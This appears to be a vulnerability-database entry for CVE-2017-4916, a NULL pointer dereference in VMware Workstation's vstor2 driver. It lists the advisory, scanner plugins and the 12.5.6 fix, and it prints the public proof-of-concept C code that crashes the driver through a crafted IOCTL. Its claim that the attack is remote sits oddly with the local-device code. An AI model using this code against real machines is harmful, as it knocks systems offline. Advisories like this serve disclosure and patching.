A vulnerability, which was classified as critical, was found in VMware Workstation Pro and Player up to 12.5.5 (Virtualization Software). This affects some unknown functionality of the component vstor2 Driver. The manipulation with an unknown input leads to a null pointer dereference vulnerability. CWE is classifying the issue as CWE-476. A NULL pointer dereference occurs when the application dereferences a pointer that it expects to be valid, but is NULL, typically causing a crash or exit. This is going to have an impact on availability.
The bug was discovered 05/18/2017. The weakness was presented 05/18/2017 as VMSA-2017-0009 as confirmed security advisory (Website). It is possible to read the advisory at vmware.com. This vulnerability is uniquely identified as CVE-2017-4916 since 12/26/2016. It is possible to initiate the attack remotely. No form of authentication is needed for exploitation. Technical details are unknown but a public exploit is available.
A public exploit has been developed by Borja Merino and been published 3 weeks after the advisory. The exploit is shared for download at exploit-db.com. It is declared as proof-of-concept. The vulnerability scanner Nessus provides a plugin with the ID 100418 (VMware Workstation 12.x < 12.5.6 vstor2 Driver NULL Pointer Dereference DoS (VMSA-2017-0009)), which helps to determine the existence of the flaw in a target environment. It is assigned to the family Windows and running in the context l. The commercial vulnerability scanner Qualys is able to test this issue with plugin 370399 (VMware Workstation Pro and Player Multiple Vulnerabilities.(VMSA-2017-0009)). The code used by the exploit is:
void ioctl_crash() { HANDLE hfile; WCHAR *vstore = L"\\\\.\\vstor2-mntapi20-shared"; DWORD dummy; char reply[0x3FDC]; hfile = CreateFileW(vstore, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL); char buf[384] = "\x80\x01\x00\x00\xc8\xdc\x00\x00\xba\xab"; DeviceIoControl(hfile, 0x2a002c, buf, 382, reply, sizeof(reply), &dummy, NULL); } void run_vix() { STARTUPINFO si; PROCESS_INFORMATION pi; RtlZeroMemory(&si, sizeof(si)); RtlZeroMemory(&pi, sizeof(pi)); si.dwFlags |= STARTF_USESHOWWINDOW; si.wShowWindow = SW_HIDE; DWORD createFlags = CREATE_SUSPENDED; CreateProcess(L"C:\\Program Files (x86)\\VMware\\VMware Workstation\\vixDiskMountServer.exe", NULL, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); }
Upgrading to version 12.5.6 eliminates this vulnerability. A possible mitigation has been published immediately after the disclosure of the vulnerability.
The vulnerability is also documented in the databases at Tenable (100418) and Exploit-DB (42140). See 101522 for similar entry.
